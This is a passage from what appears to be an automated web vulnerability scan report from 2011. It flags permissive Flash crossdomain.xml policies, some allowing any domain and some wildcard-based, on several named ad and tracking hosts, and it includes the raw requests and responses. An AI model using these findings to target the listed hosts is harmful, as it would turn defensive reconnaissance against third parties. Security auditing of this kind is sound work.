Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ping.crowdscience.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Last-Modified: Tue, 26 Apr 2011 18:28:26 GMT
ETag: "85d59-e0-4a1d67d69c680"
Accept-Ranges: bytes
Content-Length: 224
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...
3.19. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 13:28:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
3.20. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 13 May 2011 13:30:18 GMT
Content-Type: text/xml
Content-Length: 207
Date: Thu, 12 May 2011 13:30:18 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
3.21. http://s.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 12 May 2011 13:29:36 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
3.22. http://static.crowdscience.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.crowdscience.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.crowdscience.com

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Thu, 12 May 2011 13:28:27 GMT
Content-Type: text/xml
Connection: close
ETag: "2c600567b987cf9352b28a7f78e61b56"
X-CF1: fI.iad2:cf:cacheB.iad2-01
Content-Length: 224
Last-Modified: Mon, 15 Mar 2010 02:56:11 GMT
X-CF2: L
Accept-Ranges: bytes

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...
3.23. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:28:27 GMT
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "5f00162-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...
3.24. http://tags.crwdcntrl.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:57 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Wed, 20 Apr 2011 11:31:48 GMT
ETag: "3978186-ba-4a157f85e5100"
Accept-Ranges: bytes
Content-Length: 186
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="*" />
</cross-domain-policy>
3.25. http://www.pcworld.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:59 GMT
Server: Apache
X-GasHost: gas1
X-GasOriginRetry: 0
X-GasOriginTime: 0
X-Cooking-With: Gasoline-Local
X-Gasoline-Age: 744
Content-Length: 194
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Etag: W/"194-1297458026000"
Content-Type: application/xml
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
3.26. http://adx.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=ISO-8859-1
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 13:30:17 GMT
Expires: Fri, 13 May 2011 13:30:17 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
3.27. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 10:43:52 GMT
Expires: Fri, 13 May 2011 10:43:52 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 9943

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
3.28. http://mads.com.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mads.com.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mads.com.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:30 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 7038
Keep-Alive: timeout=15, max=959
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...
3.29. http://mads.zdnet.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mads.zdnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mads.zdnet.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:30 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 7038
Keep-Alive: timeout=15, max=858
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...
3.30. http://network.alluremedia.com.au/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://network.alluremedia.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: network.alluremedia.com.au

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:54 GMT
Server: Apache/2.2.9
Last-Modified: Thu, 31 Mar 2011 02:37:43 GMT
ETag: "7e470-d3-49fbe2d82ebc0"
Accept-Ranges: bytes
Content-Length: 211
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.edgefcs.net" />
</cross-dom
...[SNIP]...
3.31. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

